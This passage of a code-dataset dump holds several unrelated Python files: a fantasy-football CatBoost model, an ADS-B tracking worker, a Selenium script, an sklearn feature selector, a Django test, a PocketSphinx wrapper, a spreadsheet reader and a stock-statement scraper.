re.findall('/(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', content)\n return urls\n \n def getPublicationsNames(self, filename, mainLetter):\n \"\"\"\n Get name of all publications which are in reaearchr menu.\n\n @type filename: string\n @param filename: Filename where we want to save results.\n @type mainLetter: string\n @param mainLetter: First letter of authors from which we will find their publications.\n \"\"\"\n self.filename = filename\n for letter in \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\":\n self.__searchUsefulUrls(self.__getUrlsFromPage(\"/explore/authors/1/%s%s\" % (mainLetter,letter)),\"/explore/authors/1/%s%s\" % (mainLetter,letter))\n","sub_path":"bin/example/researchr.py","file_name":"researchr.py","file_ext":"py","file_size_in_byte":8698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345989633","text":"import pandas as pd\nfrom catboost import Pool, CatBoostRegressor\nfrom sklearn.model_selection import train_test_split\n\nimport a2_transform.features as features\nfrom a0_helpers.constants import FILE_INTER_FEATURES, DIR_DATA_RESULTS\nfrom a4_optimise.optimise import select_team\n\nfeatures.main()\ndf_all = pd.read_csv(FILE_INTER_FEATURES, encoding='utf-8-sig')\ndf_model = df_all[df_all['points'].notnull()]\n\nFIELDS_META = 
['season_name', 'gameweek', 'code', 'id', 'web_name', 'team_name', 'player_position',\n 'cost', 'selected_by_percent']\nFIELD_FEATURES = ['points_mean_last_season', 'points_prev', 'status', 'chance_of_playing', 'cost', 'nb_games']\nCAT_FEATURES = [2]\n\nFIELDS_COMBINED = FIELDS_META + [field for field in FIELD_FEATURES if field not in FIELDS_META]\nFIELD_TARGET = 'points'\n\n\nX = df_model[FIELD_FEATURES]\ny = df_model[FIELD_TARGET]\nprint(X.shape)\nprint(y.shape)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=42)\n\n# initialize Pool\npool = Pool(X, y, cat_features=CAT_FEATURES)\ntrain_pool = Pool(X_train, y_train, cat_features=CAT_FEATURES)\ntest_pool = Pool(X_test, y_test, cat_features=CAT_FEATURES)\n\n# specify the training parameters\n# model = CatBoostRegressor(iterations=2, depth=2, learning_rate=1, loss_function='RMSE')\nmodel = CatBoostRegressor()\n# train the model\nmodel.fit(train_pool, use_best_model=True, eval_set=test_pool)\n\n# Output the values\ndf_preds_all = pd.DataFrame(model.predict(df_all[FIELD_FEATURES]), columns=[\"points_predicted\"])\ndf_next_pred = pd.concat([df_all, df_preds_all], axis=1, sort=False)\ndf_next_pred.to_csv(DIR_DATA_RESULTS / 'Model_Simple_All_Predictions.csv', encoding='utf-8-sig', index=False)\n\n# make the prediction using the resulting model\ndf_next = df_all[df_all['points'].isnull()]\ndf_next = df_next.reset_index(drop=True)\ndf_preds = pd.DataFrame(model.predict(df_next[FIELD_FEATURES]), columns=[\"points_predicted\"])\ndf_next_pred = pd.concat([df_next, df_preds], axis=1, sort=False)\n\n\ndf_selection = select_team(df_next_pred)\ndf_selection.to_csv(DIR_DATA_RESULTS / 'Model_Simple_Week_Predict.csv', encoding='utf-8-sig', index=False)\n","sub_path":"code/a3_model/model_bootstrap_simple.py","file_name":"model_bootstrap_simple.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326413044","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"ADS-B Cursor-on-Target Class Definitions.\"\"\"\n\nimport json\nimport logging\nimport os\nimport queue\nimport random\nimport threading\nimport time\n\nimport pycot\nimport requests\n\nimport adsbcot\n\n__author__ = 'Greg Albrecht W2GMD '\n__copyright__ = 'Copyright 2020 Orion Labs, Inc.'\n__license__ = 'Apache License, Version 2.0'\n\n\nclass ADSBWorker(threading.Thread):\n _logger = logging.getLogger(__name__)\n if not _logger.handlers:\n _logger.setLevel(adsbcot.LOG_LEVEL)\n _console_handler = logging.StreamHandler()\n _console_handler.setLevel(adsbcot.LOG_LEVEL)\n _console_handler.setFormatter(adsbcot.LOG_FORMAT)\n _logger.addHandler(_console_handler)\n _logger.propagate = False\n\n def __init__(self, msg_queue: queue.Queue, url: str, interval: int = None,\n stale: int = None, api_key: str = None):\n self.msg_queue: queue.Queue = msg_queue\n self.url: str = url\n self.interval: int = int(interval or adsbcot.DEFAULT_INTERVAL)\n self.stale: int = stale\n self.api_key: str = api_key\n\n # Thread setup:\n threading.Thread.__init__(self)\n self.daemon = True\n self._stopper = threading.Event()\n\n def stop(self):\n \"\"\"Stop the thread at the next opportunity.\"\"\"\n self._logger.debug('Stopping ADSBWorker')\n self._stopper.set()\n\n def stopped(self):\n \"\"\"Checks if the thread is stopped.\"\"\"\n return self._stopper.isSet()\n\n def _put_queue(self, aircraft: list) -> None:\n if not aircraft:\n self._logger.warning('Empty aircraft list')\n return 
False\n\n i = 1\n for craft in aircraft:\n cot_event = adsbcot.adsb_to_cot(craft, stale=self.stale)\n if not cot_event:\n self._logger.debug(f'Empty CoT Event for craft={craft}')\n i += 1\n continue\n\n self._logger.debug(\n 'Handling %s/%s ICAO24: %s Flight: %s ',\n i, len(aircraft), craft.get('hex'), craft.get('flight'))\n\n rendered_event = cot_event.render(\n encoding='UTF-8', standalone=True)\n\n if rendered_event:\n try:\n self.msg_queue.put(rendered_event, True, 10)\n except queue.Full as exc:\n self._logger.exception(exc)\n self._logger.warning(\n 'Lost CoT Event (queue full): \"%s\"', rendered_event)\n i += 1\n\n def _get_dump1090_feed(self):\n response = requests.get(self.url)\n if response.ok:\n aircraft = response.json().get('aircraft')\n self._logger.debug('Retrieved %s aircraft', len(aircraft))\n self._put_queue(aircraft)\n\n def _get_adsbx_feed(self) -> None:\n headers = {'api-auth': self.api_key}\n response = requests.get(self.url, headers=headers)\n jresponse = json.loads(response.text)\n aircraft = jresponse.get('ac')\n self._logger.debug('Retrieved %s aircraft', len(aircraft))\n self._put_queue(aircraft)\n\n def run(self):\n \"\"\"Runs this Thread, Reads from Pollers.\"\"\"\n self._logger.info('Running ADSBWorker')\n\n self.msg_queue.put(\n adsbcot.hello_event().render(encoding='UTF-8', standalone=True))\n\n while not self.stopped():\n if 'aircraft.json' in self.url:\n self._get_dump1090_feed()\n else:\n self._get_adsbx_feed()\n time.sleep(self.interval)\n","sub_path":"adsbcot/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140183282","text":"from selenium import webdriver #导入selenium包\nfrom selenium.webdriver.support.ui import Select#导入下拉列表包\nfrom selenium.webdriver.support.ui import WebDriverWait#创建显示等待对象\nimport time\nclass selenium:\n def __init__(self):\n self.wd=webdriver.Firefox() #获取Firefox网页\n self.wd.maximize_window() #让网页全屏 窗口设置\n self.wd.get('http://www.baidu.com') #输入网址\n\n def count(self):\n self.wd.find_element_by_id('kw').send_keys('蜗牛学院') #获取输入的文本框输入蜗牛学院\n self.wd.find_element_by_id('su').click() #点击百度一下\n self.wd.find_element_by_link_text('蜗牛学院-移动互联网人才孵化基地_自动化测试培训_JAVA开发培训_...').click()\n time.sleep(2)\n handle=self.wd.current_window_handle #当前焦点所在页面handle\n handles=self.wd.window_handles#打开目标网站后,所有页面handle,返回的是列表\n for i in handles:\n if i!=handle:\n self.wd.switch_to.window(i)\n self.wd.switch_to.frame(self.wd.find_element_by_link_text('在线课堂'))\n time.sleep(2)\n self.wd.find_element_by_link_text('在线课堂').click()\n self.wd.quit() #关闭网页\nselenium().count()\n# class selenium_login:\n# def __init__(self):\n# self.ws=webdriver.Firefox() #获取Firefox页面\n# self.ws.maximize_window() #让网页全屏 窗口设置\n# self.ws.get('http://localhost/Agileone/')#输入网址\n# self.login()\n# self.sub()\n # def login(self):\n # time.sleep(2)#等待2秒进入下一个操作\n # ws=self.ws\n # ws.find_element_by_id('username').clear()\n # ele=ws.find_element_by_id('username')\n # ele.send_keys('admin')#获取用户名文本框并输入用户名admin\n # ws.find_element_by_id('password').clear()\n # ws.find_element_by_id('password').send_keys('admin')#获取密码文本框并输入密码admin\n # ws.find_element_by_id('login').click() #点击登录\n # def sub(self):\n # time.sleep(3)#等待3秒进行下一步操作\n # ws=self.ws\n # # Select(self.ws.find_element_by_id('newitem')).select_by_index(1).click()\n # # self.ws.find_element_by_id('button').click()\n # ws.find_element_by_link_text('※ 公告管理 ※').click() #找到公共管理并点击进入\n # time.sleep(1)\n # 
ws.find_element_by_id('noticeid').send_keys('01')\n # ws.find_element_by_id('headline').clear()\n # ws.find_element_by_id('headline').send_keys('蜗牛学院')\n # ws.switch_to.frame(self.ws.find_element_by_class_name('ke-iframe'))#切换焦点\n # lcc=ws.find_element_by_xpath('/html')#获取绝对路径\n # lcc.send_keys('sdsds') #在html中添加内容\n # time.sleep(2)\n # ws.find_element_by_id('add').click()\n # ws.find_element_by_id('')\n # time.sleep(2)\n # print(ws.find_element_by_id('msg').text)\n # def __del__(self):\n # self.ws.quit()\n# selenium_login()\n\n","sub_path":"WoniuXUYyuan/Dome/sele_Dome04.py","file_name":"sele_Dome04.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72168511","text":"import logging\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.feature_selection import SelectKBest, chi2\nimport numpy as np\nfrom sklearn.feature_selection.univariate_selection import _clean_nans\nfrom discoutils.thesaurus_loader import Vectors\nfrom eval.utils.misc import calculate_log_odds, update_dict_according_to_mask\n\n__author__ = 'mmb28'\n\n\nclass VectorBackedSelectKBest(SelectKBest):\n \"\"\"\n An extention of sklearn's SelectKBest, which also contains a VectorStore. Feature selection is done\n in two optional steps:\n 1: Remove all features that are not contained in the vector store\n 2: Remove any remaining low-scoring features to ensure a maximum of k features are left fit\n\n Additionally, this class stores a vocabulary (like a vectorizer), which maps features to a corresponding columns\n in the feature vector matrix. This is so that a FeatureVectorsCsvDumper can be placed after this object in a\n pipeline.\n\n Also, this object assumes its input is not a matrix X (as in SelectKBest), but a tuple (X, vocabulary). The\n vocabulary is provided by ThesaurusVectorizer, which comes before this object in a pipeline and represents the\n mapping of features to columns in X before any feature selection is done.\n \"\"\"\n\n def __init__(self, score_func=chi2, k='all', must_be_in_thesaurus=False, min_log_odds_score=0, **kwargs):\n \"\"\"\n :param min_log_odds_score: any feature with a log odds score between -min_log_odds_score and\n min_log_odds_score will be removed. 
Assumes the classification problem is binary.\n \"\"\"\n if not score_func:\n score_func = chi2\n self.k = k\n self.must_be_in_thesaurus = must_be_in_thesaurus\n self.min_log_odds_score = min_log_odds_score\n self.vocabulary_ = None\n super(VectorBackedSelectKBest, self).__init__(score_func=score_func, k=k)\n\n def fit(self, X, y, vector_source=None, clusters=None, **kwargs):\n if vector_source is None and clusters is None and self.must_be_in_thesaurus:\n logging.error('You requested feature selection based on vector presence '\n 'but did not provide a vector source.')\n raise ValueError('sector source (vectors or clusters) required with must_be_in_thesaurus')\n if self.must_be_in_thesaurus:\n self.vector_source = vector_source if vector_source else set(clusters.index)\n\n # Vectorizer also returns its vocabulary, store it and work with the rest\n X, self.vocabulary_ = X\n\n if self.k == 'all' or int(self.k) >= X.shape[1]:\n # do not bother calculating feature informativeness if all features will be used anyway\n self.scores_ = np.ones((X.shape[1],))\n else:\n super(VectorBackedSelectKBest, self).fit(X, y)\n\n self.vectors_mask = self._zero_score_of_oot_feats() \\\n if self.must_be_in_thesaurus else np.ones(X.shape[1], dtype=bool)\n self.log_odds_mask = self._zero_score_of_low_log_odds_features(X, y) \\\n if self.min_log_odds_score > 0 else np.ones(X.shape[1], dtype=bool);\n\n return self\n\n def transform(self, X):\n # Vectorizer also returns its vocabulary, remove it\n if self.vocabulary_:\n return super(VectorBackedSelectKBest, self).transform(X[0]), self.vocabulary_\n else:\n # Sometimes the training set contain no features. We don't want this to break the experiment,\n # so let is slide\n logging.error('Empty vocabulary')\n return X[0], self.vocabulary_\n\n def _zero_score_of_oot_feats(self):\n mask = np.ones(self.scores_.shape, dtype=bool)\n for feature, index in self.vocabulary_.items():\n if feature not in self.vector_source:\n mask[index] = False\n if np.count_nonzero(mask) == 0:\n logging.error('Feature selector removed all features')\n raise ValueError('Empty vocabulary')\n return mask\n\n def _zero_score_of_low_log_odds_features(self, X, y):\n if self.min_log_odds_score <= 0:\n # we don't want to use log odds score, return an all-true mask\n return np.ones(X.shape[1])\n if len(set(y)) != 2:\n raise ValueError('Calculating a log odds score requires a binary classification task')\n log_odds = calculate_log_odds(X, y)\n return (log_odds > self.min_log_odds_score) | (log_odds < -self.min_log_odds_score)\n\n def _get_support_mask(self):\n k = self.k\n chi2_scores = self.scores_\n chi2_mask = np.ones(chi2_scores.shape, dtype=bool)\n\n if k != 'all' and k < len(chi2_scores):\n # we don't want all features to be kept, and the number we want is less than the number available\n chi2_scores = _clean_nans(chi2_scores)\n selected_indices = np.argsort(chi2_scores)[:k]\n chi2_mask[selected_indices] = False\n\n mask = chi2_mask & self.vectors_mask & self.log_odds_mask\n logging.info('%d/%d features survived feature selection', np.count_nonzero(mask), len(mask))\n\n # Only keep the scores of the features that survived. This array is used to check the\n # input data shape at train and decode time matches. However, because the post-feature-selections\n # vocabulary is passed back into the vectorizer, at decode time the input will likely be smaller. 
This is\n # like doing feature selection in the vectorizer.\n self.scores_ = self.scores_[mask]\n self.log_odds_mask = self.log_odds_mask[mask]\n self.vectors_mask = self.vectors_mask[mask]\n\n self.vocabulary_ = update_dict_according_to_mask(self.vocabulary_, mask)\n return mask\n\n\nclass MetadataStripper(BaseEstimator, TransformerMixin):\n \"\"\"\n The current implementation of ThesaurusVectorizer's fit() returns not just a data matrix, but also some\n metadata (its vocabulary). This class is meant to sit in a pipeline behind the vectorizer to remove that\n metadata, so that it doesn't break other items in the pipeline.\n\n Currently several other pipeline elements can make use of this data ( VectorBackedSelectKBest and\n FeatureVectorsCsvDumper). This class must come after these in a pipeline as they do not have any\n defensive checks\n \"\"\"\n\n def fit(self, X, y, vector_source=None, strategy='linear', k=None, **kwargs):\n matrix, self.voc = X # store voc, may be handy for for debugging\n self.vector_source = vector_source\n if isinstance(self.vector_source, Vectors):\n # the vector source can be either a Thesaurus or Vectors. Both can provide nearest neighbours,\n # but the latter needs this method to be called first\n if not k:\n k = 10\n self.vector_source.init_sims([str(foo) for foo in self.voc.keys()],\n strategy=strategy, n_neighbors=k)\n return self\n\n def transform(self, X, **kwargs):\n # if X is a tuple, strip metadata, otherwise let it be\n return X[0] if tuple(X) == X else X\n\n def get_params(self, deep=True):\n return super(MetadataStripper, self).get_params(deep)\n","sub_path":"builder/composers/feature_selectors.py","file_name":"feature_selectors.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405515583","text":"from django.test import TestCase\nfrom rest_framework.test import APITestCase\nfrom django.urls import reverse\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import status\n\nimport json\nfrom api.account.user_serializer import UserProfileSerializer\nfrom api.account.profile_serializer import ProfileSerializer\n\nfrom profiles.models import Profile\nfrom django.contrib.auth import get_user_model\nUser = get_user_model()\n\n\nclass UserSerializerTestCase(TestCase):\n \"\"\"compare expected and received data after ser-on\"\"\"\n def setUp(self): \n self.user = User.objects.create(email=\"zoo@mail.com\") \n self.profile = Profile.objects.last() \n \n def test_user_serializer(self): \n \"\"\" check weather user info comes with his profile \"\"\" \n serial_user = UserProfileSerializer(self.user).data\n expected_data = {\n \"id\":self.user.id,\n \"email\":self.user.email,\n \"first_name\":self.user.first_name,\n \"last_name\":self.user.last_name,\n \"profile\":{\n \"unid\":self.profile.unid, \n \"user_id\": self.user.id, \n \"first_name\":\"\",\n \"last_name\":\"\",\n \"display_name\":\"\",\n \"image\":None,\n \"website\":\"\",\n \"linkedin_profile\":\"\",\n \"name\":self.user.get_name\n }\n \n } \n self.assertEqual(serial_user, expected_data)\n\n def test_user_serializer_via_profile_attr(self): \n \"\"\" check weather user info comes with his profile via obj user\"\"\" \n serial_user = UserProfileSerializer(self.user).data\n expected_data = {\n \"id\":self.user.id,\n \"email\":self.user.email,\n \"first_name\":self.user.first_name,\n \"last_name\":self.user.last_name,\n \"profile\":{\n # here \n \"unid\":self.user.profile.unid, \n \"user_id\": 
self.user.id, \n \"first_name\":\"\",\n \"last_name\":\"\",\n \"display_name\":\"\",\n \"image\":None,\n \"website\":\"\",\n \"linkedin_profile\":\"\",\n \"name\":self.user.get_name\n }\n \n } \n self.assertEqual(serial_user, expected_data)\n\n \n\n","sub_path":"api/tests/tests_user/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"443571522","text":"########################################################\n# Adapted from the SpeechRecognition (3.5.0) by Uberi\n# https://github.com/Uberi/speech_recognition\n########################################################\n\nimport os\nimport tempfile, shutil\n \n \nclass RequestError(Exception): pass\n\ntry:\n\tfrom pocketsphinx import pocketsphinx\n\tfrom sphinxbase import sphinxbase\nexcept ImportError:\n\traise RequestError(\"missing PocketSphinx module:\\\n\t ensure that PocketSphinx is set up correctly.\")\nexcept ValueError:\n\traise RequestError(\"bad PocketSphinx installation detected;\\\n\t make sure you have PocketSphinx version 0.0.9 or better.\")\n\n\n\n\nclass tempfile_TemporaryDirectory(object):\n \"\"\"Python 2 compatibility: backport of ``tempfile.TemporaryDirectory``\n from Python 3\"\"\"\n\n def __enter__(self):\n self.name = tempfile.mkdtemp()\n return self.name\n\n def __exit__(self, exc_type, exc_value, traceback):\n shutil.rmtree(self.name)\n\n\nclass Sphinx():\n\t\"\"\"\n\t\tPerforms speech recognition on raw audio data, using CMU Sphinx.\n\n\t\tThe recognition language is determined by ``language``, an RFC5646\n\t\tlanguage tag like ``\"en-US\"`` or ``\"en-GB\"``, defaulting to US English.\n\t\tOut of the box, only ``en-US`` is supported.\n\n\t\"\"\"\n\n\tdef __init__(self, language = \"en-US\"):\n\t\t\"\"\"[summary]\n\t\t\n\t\t[description]\n\t\t\n\t\tKeyword Arguments:\n\t\t\tlanguage {str} -- [description] (default: {\"en-US\"})\n\t\t\n\t\tRaises:\n\t\t\tRequestError -- There are issues with the Sphinx installation.\n\t\t\"\"\"\n\t\tassert isinstance(language, str), \"``language`` must be a string\"\n\n\t\tlanguage_directory = os.path.join(os.path.dirname(\n\t\t\tos.path.realpath(__file__)), \"pocketsphinx-data\", language)\n\n\t\tif not os.path.isdir(language_directory):\n\t\t\traise RequestError(\"missing PocketSphinx language data directory:\\\n\t\t\t \\\"{0}\\\"\".format(language_directory))\n\n\t\tacoustic_parameters_directory = os.path.join(language_directory, \n\t\t\t\"acoustic-model\")\n\n\t\tif not os.path.isdir(acoustic_parameters_directory):\n\t\t\traise RequestError(\"missing PocketSphinx language model parameters\\\n\t\t\t directory: \\\"{0}\\\"\".format(acoustic_parameters_directory))\n\t\t\n\t\tlanguage_model_file = os.path.join(language_directory, \n\t\t\t\"language-model.lm.bin\")\n\n\t\tif not os.path.isfile(language_model_file):\n\t\t\traise RequestError(\"missing PocketSphinx language model file:\\\n\t\t\t \\\"{0}\\\"\".format(language_model_file))\n\t\t\n\t\tphoneme_dictionary_file = os.path.join(language_directory,\n\t\t \"pronounciation-dictionary.dict\")\n\n\t\tif not os.path.isfile(phoneme_dictionary_file):\n\t\t\traise RequestError(\"missing PocketSphinx phoneme dictionary file:\\\n\t\t\t \\\"{0}\\\"\".format(phoneme_dictionary_file))\n\n\t\t# create decoder object\n\t\tconfig = pocketsphinx.Decoder.default_config()\n\t\t\n\t\t# set the path of the hidden Markov model (HMM) parameter files\n\t\tconfig.set_string(\"-hmm\", 
acoustic_parameters_directory)\n\t\t\n\t\tconfig.set_string(\"-lm\", language_model_file)\n\t\tconfig.set_string(\"-dict\", phoneme_dictionary_file)\n\n\t\t# disable logging (logging causes unwanted output in terminal)\n\t\tconfig.set_string(\"-logfn\", os.devnull)\n\n\t\tself.decoder = pocketsphinx.Decoder(config)\n\n\n\tdef recognize(self, raw_data, keyword_entries = None, show_all = False):\n\t\t\"\"\"Performs speech to text recognition using CMU Sphinx\n\t\t\n\t\tIt's possible to search for specific keywords in the speech.\n\t\tIf specified, the keywords to search for are determined by\n\t\t``keyword_entries``, an iterable of tuples of the form\n\t\t``(keyword, sensitivity)``, where ``keyword`` is a phrase, and\n\t\t``sensitivity`` is how sensitive to this phrase the recognizer\n\t\tshould be, on a scale of 0 (very insensitive, more false negatives)\n\t\tto 1 (very sensitive, more false positives) inclusive.\n\t\tIf not specified or ``None``, no keywords are used and Sphinx will\n\t\tsimply transcribe whatever words it recognizes.\n\t\tSpecifying ``keyword_entries`` is more accurate than just looking for\n\t\tthose same keywords in non-keyword-based transcriptions,\n\t\tbecause Sphinx knows specifically what sounds to look for.\n\t\t\n\t\tArguments:\n\t\t\traw_data {[type]} -- Raw audio data to be recognized\n\t\t\n\t\tKeyword Arguments:\n\t\t\tkeyword_entries {[type]} -- Keywords to search for (default: {None})\n\t\t\tshow_all {bool} -- Sets the return to the most likely transcription\n\t\t\t\tif false, otherwise returns the Sphinx \n\t\t\t\t``pocketsphinx.pocketsphinx.Decoder`` object resulting from the\n\t\t\t\trecognition. (default: {False})\n\t\t\n\t\tRaises:\n\t\t\tUnknownValueError -- The speech is unintelligible\n\t\t\"\"\"\n\t\t\n\t\t\n\t\tassert keyword_entries is None or all(isinstance(keyword, str) \\\n\t\t\tand 0 <= sensitivity <= 1 \\\n\t\t\tfor keyword, sensitivity in keyword_entries),\\\n\t\t\t \"``keyword_entries`` must be ``None`` or a list of pairs of\\\n\t\t\t strings and numbers between 0 and 1\"\n\n\t\t\n\t\t# obtain recognition results\n\t\tif keyword_entries is not None: # explicitly specified set of keywords\n\t\t\twith tempfile_TemporaryDirectory() as temp_directory:\n\t\t\t\t# generate a keywords file - Sphinx documentation recommendeds\n\t\t\t\t# sensitivities between 1e-50 and 1e-5\n\t\t\t\tkeywords_path = os.path.join(temp_directory, \"keyphrases.txt\")\n\t\t\t\t\n\t\t\t\twith open(keywords_path, \"w\") as f:\n\t\t\t\t\tf.writelines(\"{} /1e{}/\\n\"\n\t\t\t\t\t\t.format(keyword, 45 * sensitivity - 50) \n\t\t\t\t\t\tfor keyword, sensitivity in keyword_entries)\n\n\t\t\t\t# perform the speech recognition with the keywords file\n\t\t\t\t# (this is inside the context manager so the file isn't\n\t\t\t\t# deleted until we're done)\n\t\t\t\tself.decoder.set_kws(\"keywords\", keywords_path)\n\n\t\t\t\tself.decoder.set_search(\"keywords\")\n\n\t\t\t\t# begin utterance processing\n\t\t\t\tself.decoder.start_utt() \n\t\t\t\t\n\t\t\t\t# process audio data with recognition enabled\n\t\t\t\t# (no_search = False), as a full utterance (full_utt = True)\n\t\t\t\tself.decoder.process_raw(raw_data, False, True)\n\t\t\t\t\n\t\t\t\t# stop utterance processing\n\t\t\t\tself.decoder.end_utt() \n\n\t\telse: # no keywords, perform freeform recognition\n\t\t\tself.decoder.start_utt() # begin utterance processing\n\t\t\t\n\t\t\t# process audio data with recognition enabled (no_search = False),\n\t\t\t# as a full utterance (full_utt = True)\n\t\t\tself.decoder.process_raw(raw_data, 
False, True) \n\t\t\t\n\t\t\tself.decoder.end_utt() # stop utterance processing\n\n\t\tif show_all: return self.decoder\n\n\t\t# return results\n\t\thypothesis = self.decoder.hyp()\n\t\tif hypothesis is not None: return hypothesis.hypstr\n\t\traise UnknownValueError() # no transcriptions available\n","sub_path":"offline/VM/sphinx.py","file_name":"sphinx.py","file_ext":"py","file_size_in_byte":6291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282830952","text":"import openpyxl\n\npath = '/Users/ahstein/PycharmProjects/Neptune/jupiter/testmodels/SampleBook1.xlsx'\n# path = '/Users/ahstein/PycharmProjects/Neptune/jupiter/testmodels/Netflix Model.xlsx'\nwb_obj = openpyxl.load_workbook(path, data_only=1)\nsheet_obj = wb_obj.active\ncell_obj = sheet_obj.cell(row=4, column=3)\n# the above refers to C4\n\nMaster_label_dict = {\"Revenue\", \"Rev\", \"Other Non-Operating Inc.\", \"Restructuring Charges\", \"Legal Settlements\",\n \"Other Unusual Items\", \"COGS\", \"Gross Margin\", \"Tech Costs\", \"Other SG&A\", \"EBITDA\",\n \"Provision for Bad Debts\", \"Depreciation & Amort.\"\n }\n\nlabels = {}\nfield_list = []\nfield_list_master = []\n\ndef row_sweep(self, row):\n # creates a list of all text in a given row\n for x in range(1, 3):\n cell_obj_new = sheet_obj.cell(row=row, column=x)\n # print(cell_obj_new.data_type, row, x)\n if cell_obj_new.data_type == 's':\n lab = cell_obj_new.value\n lab_addr = (row, x)\n new_element = (lab,lab_addr)\n field_list.append(new_element)\n\nfor a in range(4, 20):\n field_list_master = []\n row_sweep(self=None, row=a)\n field_list_master = field_list_master + field_list\nprint(\"Field list master is:\", field_list_master)\n\n# Getting the field name and address from the field master list\na1 = field_list_master[0]\nlabel1, address1 = a1[0], a1[1]\nrow1 = address1[0]\ncol1 = address1[1]\n\ndef nums_to_right(self, key, row1, col1):\n span_list = []\n for span in range(1,10):\n type = sheet_obj.cell(row1, col1 + span).data_type\n span_dict = {}\n if (type == 'n' or type == 'f'):\n value_10 = sheet_obj.cell(row1, col1 + span)._value\n span_list.append(value_10)\n span_dict[key] = span_list\n print(span_dict)\n\nfor i in field_list_master:\n key2 = i[0]\n row1v = i[1][0]\n col1v = i[1][1]\n nums_to_right(self=None, key=key2, row1=row1v, col1=col1v)\n\n# Old function, not in use\ndef array_strip(self, fieldlabel):\n global array1, array2, array3\n for ind in range(0, 10):\n row = labels[fieldlabel][0] + ind\n col = labels[fieldlabel][1]\n type = sheet_obj.cell(col, row).data_type\n value_10 = sheet_obj.cell(col, row)._value\n if (type == 'n' or type == 'f') and value_10 != None:\n array1[ind] = sheet_obj.cell(col, row)._value\n array2 = {fieldlabel: array1}\n return (array2)\n\n# for field in keys_list:\n# b2 = array_strip(self=None, fieldlabel=field)\n# array3.update(b2)\n\n# keys = dict.fromkeys(labels)\n# keys_list = list(keys)\n# a = labels[\"COGS\"][0]\n# b = sheet_obj.cell(labels[\"COGS\"][0], labels[\"COGS\"][1]).value\n\n# Old code -- superseded\n# Reads all of the text labels in a given file, creates dictionary of form {\"Revenue\": (3.3)}\n# for y in range(1,50):\n# for x in range(1,50):\n# cell_obj_new = sheet_obj.cell(row=y, column=x)\n# if cell_obj_new.data_type == 's':\n# lab = cell_obj_new.value\n# lab_addr = (x,y)\n# labels[lab] = lab_addr\n\n# Reads all of the text labels in a given file\n# for y in range(1,8):\n# for x in range(1,8):\n# cell_obj_new = sheet_obj.cell(row=y, column=x)\n# if 
cell_obj_new.data_type == 's':\n# lab = cell_obj_new.value\n# lab_addr = (x,y)\n# labels[lab] = lab_addr\n\n\n# a = labels[\"COGS\"][0]\n# b = sheet_obj.cell(labels[\"COGS\"][0], labels[\"COGS\"][1]).value\n\n# array1 = {}\n\n# for ind in range(0, 10):\n# row = labels[\"COGS\"][0] + ind\n# col = labels[\"COGS\"][1]\n# type = sheet_obj.cell(col, row).data_type\n# value_10 = sheet_obj.cell(col, row)._value\n# if (type == 'n' or type == 'f') and value_10 != None:\n# array1[ind] = sheet_obj.cell(col, row)._value\n# array2 = {\"COGS\": array1}\n","sub_path":"jupiter/FieldCapture.py","file_name":"FieldCapture.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"396114395","text":"# File created by J Bujarski\n# pic.py contains functions necessary for picture loading and viewing\n# load_pic:\n# Returns picture as a 2d array of RGB values, as per the w/h values passed in.\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\n\n\ndef load_pic(name, wd, ht):\n img = Image.open(name)\n imgA = np.array(img.resize((wd, ht)))\n\n return imgA\n\n\ndef view_pic(name):\n plt.figure()\n plt.imshow(name)\n plt.show()\n","sub_path":"pic.py","file_name":"pic.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491254417","text":"from bs4 import BeautifulSoup\nimport requests\nfrom pandas import read_html\n\n\ndef stmts(script_code):\n try:\n x = int(script_code) \n script_code = str(x)\n if len(script_code) == 6:\n baseurl = 'https://www.screener.in/api/company/search/?q='\n url = (baseurl + script_code)\n urlreq = requests.get(url)\n stocks = urlreq.json()\n screener_url = stocks[0]['url']\n if len(screener_url) == 0: \n msg = {'info' : 'incoorect script_code'}\n return msg\n dope = ('https://www.screener.in'+str(screener_url)) \n res = requests.get(dope)\n soup = BeautifulSoup(res.content, 'lxml')\n\n df = read_html(dope,index_col=None)\n\n # QUARTERLY RESULTS\n quarter_res = df[0].to_dict()\n # PROFIT-LOSS STATEMENTS\n pl_stats = df[1].to_dict()\n # BALANCESHEETS\n bal_sheets = df[6].to_dict()\n # CASHFLOW\n cashf_stats = df[7].to_dict()\n statements = {'quarter_results':quarter_res, 'profit-loss_stats':pl_stats, 'balancesheets':bal_sheets,\n 'cashflow_stats':cashf_stats}\n\n # ANNUAL REPORT LINKS\n link_text, links, data, data_text = list(), list(), list(), list()\n for j in range(1,6):\n for link in soup.select(\"div.three:nth-of-type(2) li:nth-of-type(\"+str(j)+\") a\"):\n data = (link['href'])\n links.append(data)\n data_text = link.text.strip().replace(\"\\n\",\"\")\n link_text.append(data_text)\n annual_reports = dict(zip(link_text, links))\n\n # CREDIT-RATINGS REPORT LINKS\n link_text, links, data, data_text, count = 